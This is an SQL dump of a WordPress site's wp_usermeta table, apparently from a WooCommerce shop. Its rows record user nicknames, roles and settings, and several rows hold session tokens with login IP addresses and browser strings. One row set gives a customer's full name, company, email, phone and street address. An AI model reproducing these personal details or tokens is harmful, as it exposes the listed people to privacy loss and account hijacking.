INSERT INTO `wp_usermeta` VALUES (13062, 837, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13063, 837, '_yoast_wpseo_profile_updated', '1493668338'); 
INSERT INTO `wp_usermeta` VALUES (13064, 837, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13065, 838, 'nickname', 'jeremy.a.cole.mil1957'); 
INSERT INTO `wp_usermeta` VALUES (13066, 838, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13067, 838, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13068, 838, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13069, 838, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13070, 838, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13071, 838, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13072, 838, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13073, 838, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13074, 838, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13075, 838, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13076, 838, '_yoast_wpseo_profile_updated', '1493671092'); 
INSERT INTO `wp_usermeta` VALUES (13077, 838, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13078, 839, 'nickname', 'adammperlman2008'); 
INSERT INTO `wp_usermeta` VALUES (13079, 839, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13080, 839, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13081, 839, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13082, 839, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13083, 839, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13084, 839, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13085, 839, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13086, 839, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13087, 839, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13088, 839, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13089, 839, '_yoast_wpseo_profile_updated', '1493671419'); 
INSERT INTO `wp_usermeta` VALUES (13090, 839, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13091, 840, 'nickname', 'lori1991'); 
INSERT INTO `wp_usermeta` VALUES (13092, 840, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13093, 840, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13094, 840, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13095, 840, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13096, 840, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13097, 840, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13098, 840, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13099, 840, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13100, 840, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13101, 840, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13102, 840, '_yoast_wpseo_profile_updated', '1493671689'); 
INSERT INTO `wp_usermeta` VALUES (13103, 840, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13104, 841, 'nickname', 'smith_20_011964'); 
INSERT INTO `wp_usermeta` VALUES (13105, 841, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13106, 841, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13107, 841, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13108, 841, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13109, 841, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13110, 841, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13111, 841, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13112, 841, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13113, 841, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13114, 841, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13115, 841, '_yoast_wpseo_profile_updated', '1493672104'); 
INSERT INTO `wp_usermeta` VALUES (13116, 841, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13117, 842, 'nickname', 'npaganucci1952'); 
INSERT INTO `wp_usermeta` VALUES (13118, 842, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13119, 842, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13120, 842, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13121, 842, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13122, 842, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13123, 842, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13124, 842, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13125, 842, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13126, 842, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13127, 842, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13128, 842, '_yoast_wpseo_profile_updated', '1493672182'); 
INSERT INTO `wp_usermeta` VALUES (13129, 842, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13130, 843, 'nickname', 'mkyza_inc'); 
INSERT INTO `wp_usermeta` VALUES (13131, 843, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13132, 843, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13133, 843, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13134, 843, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13135, 843, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13136, 843, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13137, 843, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13138, 843, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13139, 843, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13140, 843, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13141, 843, '_yoast_wpseo_profile_updated', '1493690935'); 
INSERT INTO `wp_usermeta` VALUES (13142, 843, 'session_tokens', 'a:1:{s:64:"1fdc9bb1d8bbc0fb23c7a8b28a51f35f5e5aa53a98064fdb274c367e7a45cc19";a:4:{s:10:"expiration";i:1494900551;s:2:"ip";s:12:"49.144.95.45";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";s:5:"login";i:1493690951;}}'); 
INSERT INTO `wp_usermeta` VALUES (13143, 844, 'nickname', 'analisa.hubac'); 
INSERT INTO `wp_usermeta` VALUES (13144, 844, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13145, 844, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13146, 844, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13147, 844, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13148, 844, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13149, 844, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13150, 844, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13151, 844, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13152, 844, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13153, 844, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13154, 844, '_yoast_wpseo_profile_updated', '1493730127'); 
INSERT INTO `wp_usermeta` VALUES (13155, 844, 'session_tokens', 'a:1:{s:64:"2f09d504ce5d51d27d8d7289217744778f23deeb9b5f6a0b82853a706780698e";a:4:{s:10:"expiration";i:1494939737;s:2:"ip";s:14:"199.116.173.79";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1493730137;}}'); 
INSERT INTO `wp_usermeta` VALUES (13156, 845, 'nickname', 'analisa.hubac1'); 
INSERT INTO `wp_usermeta` VALUES (13157, 845, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13158, 845, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13159, 845, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13160, 845, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13161, 845, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13162, 845, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13163, 845, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13164, 845, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13165, 845, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13166, 845, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13167, 845, '_yoast_wpseo_profile_updated', '1493730207'); 
INSERT INTO `wp_usermeta` VALUES (13168, 845, 'session_tokens', 'a:1:{s:64:"5a6f5e0c3ffd8004b6ef809e61871f0fb267ee9fe406518f2e68b8ab5c8e8a91";a:4:{s:10:"expiration";i:1494939818;s:2:"ip";s:14:"199.116.173.79";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1493730218;}}'); 
INSERT INTO `wp_usermeta` VALUES (13169, 846, 'nickname', 'sgoetz'); 
INSERT INTO `wp_usermeta` VALUES (13170, 846, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13171, 846, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13172, 846, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13173, 846, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13174, 846, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13175, 846, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13176, 846, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13177, 846, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13178, 846, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13179, 846, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13180, 846, '_yoast_wpseo_profile_updated', '1493737075'); 
INSERT INTO `wp_usermeta` VALUES (13181, 846, 'session_tokens', 'a:1:{s:64:"2f2721a21c3e971f65eb272ee3e5335d0d0f9b84b9c8aaf10ab8eebdc664ce4b";a:4:{s:10:"expiration";i:1494946687;s:2:"ip";s:13:"192.80.95.230";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36";s:5:"login";i:1493737087;}}'); 
INSERT INTO `wp_usermeta` VALUES (13182, 2, 'closedpostboxes_dashboard', 'a:0:{}'); 
INSERT INTO `wp_usermeta` VALUES (13183, 847, 'nickname', 'klahar'); 
INSERT INTO `wp_usermeta` VALUES (13184, 847, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13185, 847, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13186, 847, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13187, 847, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13188, 847, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13189, 847, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13190, 847, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13191, 847, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13192, 847, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13193, 847, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13194, 847, '_yoast_wpseo_profile_updated', '1493738018'); 
INSERT INTO `wp_usermeta` VALUES (13195, 847, 'session_tokens', 'a:1:{s:64:"beec0b48e59f61f5cf3e8cdc334a4f129967877a837de8333c8c406b0e31e86c";a:4:{s:10:"expiration";i:1494947626;s:2:"ip";s:12:"24.62.145.68";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1493738026;}}'); 
INSERT INTO `wp_usermeta` VALUES (13202, 848, 'nickname', 'bjones1963'); 
INSERT INTO `wp_usermeta` VALUES (13203, 848, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13204, 848, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13205, 848, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13206, 848, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13207, 848, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13208, 848, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13209, 848, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13210, 848, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13211, 848, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13212, 848, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13213, 848, '_yoast_wpseo_profile_updated', '1493743719'); 
INSERT INTO `wp_usermeta` VALUES (13214, 848, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13215, 849, 'nickname', 'mireya19681984'); 
INSERT INTO `wp_usermeta` VALUES (13216, 849, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13217, 849, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13218, 849, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13219, 849, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13220, 849, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13221, 849, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13222, 849, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13223, 849, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13224, 849, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13225, 849, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13226, 849, '_yoast_wpseo_profile_updated', '1493747479'); 
INSERT INTO `wp_usermeta` VALUES (13227, 849, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13228, 850, 'nickname', 'stephen.weiler'); 
INSERT INTO `wp_usermeta` VALUES (13229, 850, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13230, 850, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13231, 850, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13232, 850, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13233, 850, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13234, 850, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13235, 850, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13236, 850, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13237, 850, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13238, 850, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13239, 850, '_yoast_wpseo_profile_updated', '1493749147'); 
INSERT INTO `wp_usermeta` VALUES (13240, 850, 'session_tokens', 'a:1:{s:64:"fd9cc767afe6f320c1c3a6e3111de3bb167c6070b58ab9235c5a3fc8cfb977ae";a:4:{s:10:"expiration";i:1494958757;s:2:"ip";s:12:"208.0.64.246";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.81 Safari/537.36";s:5:"login";i:1493749157;}}'); 
INSERT INTO `wp_usermeta` VALUES (13241, 850, 'billing_first_name', 'stephen'); 
INSERT INTO `wp_usermeta` VALUES (13242, 850, 'billing_last_name', 'weiler'); 
INSERT INTO `wp_usermeta` VALUES (13243, 850, 'billing_company', 'FLIR Detection'); 
INSERT INTO `wp_usermeta` VALUES (13244, 850, 'billing_email', 'stephen.weiler@flir.com'); 
INSERT INTO `wp_usermeta` VALUES (13245, 850, 'billing_phone', '8658700'); 
INSERT INTO `wp_usermeta` VALUES (13246, 850, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (13247, 850, 'billing_address_1', '100 Midland Rd'); 
INSERT INTO `wp_usermeta` VALUES (13248, 850, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (13249, 850, 'billing_city', 'Oak Ridge'); 
INSERT INTO `wp_usermeta` VALUES (13250, 850, 'billing_state', 'TN'); 
INSERT INTO `wp_usermeta` VALUES (13251, 850, 'billing_postcode', '37830'); 
INSERT INTO `wp_usermeta` VALUES (13252, 851, 'nickname', 'isaac.villanueva'); 
INSERT INTO `wp_usermeta` VALUES (13253, 851, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13254, 851, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13255, 851, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13256, 851, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13257, 851, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13258, 851, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13259, 851, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13260, 851, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13261, 851, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13262, 851, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13263, 851, '_yoast_wpseo_profile_updated', '1493752480'); 
INSERT INTO `wp_usermeta` VALUES (13264, 851, 'session_tokens', 'a:1:{s:64:"1d536cc3e55356b3da046a7548229049ba44b43ae4e2f268ac8c06d9ef680e51";a:4:{s:10:"expiration";i:1494962091;s:2:"ip";s:15:"209.221.240.193";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0; Firefox 45.8.0 - 111212-1700920044-1.36";s:5:"login";i:1493752491;}}'); 
INSERT INTO `wp_usermeta` VALUES (13265, 851, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (13266, 852, 'nickname', 'chrishall23531978'); 
INSERT INTO `wp_usermeta` VALUES (13267, 852, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13268, 852, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13269, 852, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13270, 852, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13271, 852, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13272, 852, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13273, 852, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13274, 852, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13275, 852, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13276, 852, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13277, 852, '_yoast_wpseo_profile_updated', '1493757246'); 
INSERT INTO `wp_usermeta` VALUES (13278, 852, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13279, 853, 'nickname', 'naynay14142006'); 
INSERT INTO `wp_usermeta` VALUES (13280, 853, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13281, 853, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13282, 853, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13283, 853, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13284, 853, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13285, 853, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13286, 853, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13287, 853, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13288, 853, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13289, 853, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13290, 853, '_yoast_wpseo_profile_updated', '1493759033'); 
INSERT INTO `wp_usermeta` VALUES (13291, 853, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13292, 854, 'nickname', 'bar45hde2007'); 
INSERT INTO `wp_usermeta` VALUES (13293, 854, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13294, 854, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13295, 854, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13296, 854, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13297, 854, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13298, 854, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13299, 854, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13300, 854, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13301, 854, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13302, 854, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13303, 854, '_yoast_wpseo_profile_updated', '1493762313'); 
INSERT INTO `wp_usermeta` VALUES (13304, 854, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13305, 855, 'nickname', 'andrewhellwig1982'); 
INSERT INTO `wp_usermeta` VALUES (13306, 855, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13307, 855, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13308, 855, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13309, 855, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13310, 855, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13311, 855, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13312, 855, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13313, 855, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13314, 855, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13315, 855, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13316, 855, '_yoast_wpseo_profile_updated', '1493764551'); 
INSERT INTO `wp_usermeta` VALUES (13317, 855, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13318, 856, 'nickname', 'brinabartos1992'); 
INSERT INTO `wp_usermeta` VALUES (13319, 856, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13320, 856, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13321, 856, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13322, 856, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13323, 856, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13324, 856, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13325, 856, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13326, 856, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13327, 856, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13328, 856, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13329, 856, '_yoast_wpseo_profile_updated', '1493767091'); 
INSERT INTO `wp_usermeta` VALUES (13330, 856, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13331, 857, 'nickname', 'mamiesullivan1963'); 
INSERT INTO `wp_usermeta` VALUES (13332, 857, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13333, 857, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13334, 857, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13335, 857, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13336, 857, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13337, 857, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13338, 857, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13339, 857, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13340, 857, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13341, 857, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13342, 857, '_yoast_wpseo_profile_updated', '1493768788'); 
INSERT INTO `wp_usermeta` VALUES (13343, 857, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13344, 858, 'nickname', 'slg40071962'); 
INSERT INTO `wp_usermeta` VALUES (13345, 858, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13346, 858, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13347, 858, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13348, 858, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13349, 858, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13350, 858, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13351, 858, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13352, 858, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13353, 858, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13354, 858, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13355, 858, '_yoast_wpseo_profile_updated', '1493769080'); 
INSERT INTO `wp_usermeta` VALUES (13356, 858, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13357, 859, 'nickname', 'matthewhouseknecht2006'); 
INSERT INTO `wp_usermeta` VALUES (13358, 859, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13359, 859, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13360, 859, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13361, 859, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13362, 859, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (13363, 859, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (13364, 859, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (13365, 859, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13366, 859, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (13367, 859, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (13368, 859, '_yoast_wpseo_profile_updated', '1493774142'); 
INSERT INTO `wp_usermeta` VALUES (13369, 859, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (13370, 860, 'nickname', 'sprtns172006'); 
INSERT INTO `wp_usermeta` VALUES (13371, 860, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13372, 860, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (13373, 860, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (13374, 860, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (13375, 860, 'comment_shortcuts', 'false'); 
